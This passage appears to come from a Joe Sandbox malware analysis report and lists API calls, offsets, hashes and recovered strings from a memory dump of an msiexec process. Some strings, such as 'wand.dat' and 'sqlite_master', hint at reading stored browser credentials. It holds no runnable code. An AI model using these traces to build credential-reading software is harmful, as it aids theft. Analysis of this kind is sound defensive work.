                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                      • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                      APIs
                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                      • GetMenu.USER32(?), ref: 00410F8D
                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                      • String ID:
                      • API String ID: 1889144086-0
                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                      APIs
                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                      • GetLastError.KERNEL32 ref: 0041810A
                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$CloseCreateErrorHandleLastMappingView
                      • String ID:
                      • API String ID: 1661045500-0
                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                      APIs
                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                      Strings
                      • Cannot add a column to a view, xrefs: 0042EBE8
                      • sqlite_altertab_%s, xrefs: 0042EC4C
                      • virtual tables may not be altered, xrefs: 0042EBD2
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                      • API String ID: 1297977491-2063813899
                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                      APIs
                      • memset.MSVCRT ref: 0040560C
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                      • String ID: *.*$dat$wand.dat
                      • API String ID: 2618321458-1828844352
                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                      APIs
                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                      • wcslen.MSVCRT ref: 00410C74
                      • _wtoi.MSVCRT(?), ref: 00410C80
                      • _wcsicmp.MSVCRT ref: 00410CCE
                      • _wcsicmp.MSVCRT ref: 00410CDF
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                      • String ID:
                      • API String ID: 1549203181-0
                      • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                      • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                      APIs
                      • memset.MSVCRT ref: 00412057
                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                      • GetKeyState.USER32(00000010), ref: 0041210D
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                      • String ID:
                      • API String ID: 3550944819-0
                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                      APIs
                      • free.MSVCRT ref: 0040F561
                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$free
                      • String ID: g4@
                      • API String ID: 2888793982-2133833424
                      • Opcode ID: f4c875be1691c16b6b0488e2c5ae259581ad0285ed380af5e7f19d00b6790c48
                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                      • Opcode Fuzzy Hash: f4c875be1691c16b6b0488e2c5ae259581ad0285ed380af5e7f19d00b6790c48
                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                      APIs
                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: @
                      • API String ID: 3510742995-2766056989
                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                      APIs
                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                      • memset.MSVCRT ref: 0040AF18
                      • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@??3@memcpymemset
                      • String ID:
                      • API String ID: 1865533344-0
                      • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                      • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                      APIs
                      • memset.MSVCRT ref: 004144E7
                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                      • memset.MSVCRT ref: 0041451A
                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                      • String ID:
                      • API String ID: 1127616056-0
                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                      APIs
                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                      • memset.MSVCRT ref: 0042FED3
                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: sqlite_master
                      • API String ID: 438689982-3163232059
                      • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                      • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                      APIs
                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                      • wcscpy.MSVCRT ref: 00414DF3
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: BrowseFolderFromListMallocPathwcscpy
                      • String ID:
                      • API String ID: 3917621476-0
                      • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                      • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                      APIs
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                      • _snwprintf.MSVCRT ref: 00410FE1
                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • _snwprintf.MSVCRT ref: 0041100C
                      • wcscat.MSVCRT ref: 0041101F
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                      • String ID:
                      • API String ID: 822687973-0
                      • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                      • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                      APIs
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                      • malloc.MSVCRT ref: 00417459
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                      • free.MSVCRT ref: 0041747F
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$freemalloc
                      • String ID:
                      • API String ID: 2605342592-0
                      • Opcode ID: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                      • Opcode Fuzzy Hash: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                      • RegisterClassW.USER32(?), ref: 00412428
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: HandleModule$ClassCreateRegisterWindow
                      • String ID:
                      • API String ID: 2678498856-0
                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                      APIs
                      • GetDlgItem.USER32(?,?), ref: 00409B40
                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: MessageSend$Item
                      • String ID:
                      • API String ID: 3888421826-0
                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                      APIs
                      • memset.MSVCRT ref: 00417B7B
                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                      • GetLastError.KERNEL32 ref: 00417BB5
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$ErrorLastLockUnlockmemset
                      • String ID:
                      • API String ID: 3727323765-0
                      • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                      • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                      APIs
                      • memset.MSVCRT ref: 0040F673
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                      • strlen.MSVCRT ref: 0040F6A2
                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                      • String ID:
                      • API String ID: 2754987064-0
                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                      APIs
                      • memset.MSVCRT ref: 0040F6E2
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                      • strlen.MSVCRT ref: 0040F70D
                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                      • String ID:
                      • API String ID: 2754987064-0
                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                      APIs
                      • memset.MSVCRT ref: 00402FD7
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                      • strlen.MSVCRT ref: 00403006
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                      • String ID:
                      • API String ID: 2754987064-0
                      • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                      • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: wcscpy$CloseHandle
                      • String ID: General
                      • API String ID: 3722638380-26480598
                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                      APIs
                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                      • GetStockObject.GDI32(00000000), ref: 004143C6
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                      • String ID:
                      • API String ID: 764393265-0
                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                      APIs
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Time$System$File$LocalSpecific
                      • String ID:
                      • API String ID: 979780441-0
                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                      APIs
                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                      Memory Dump Source
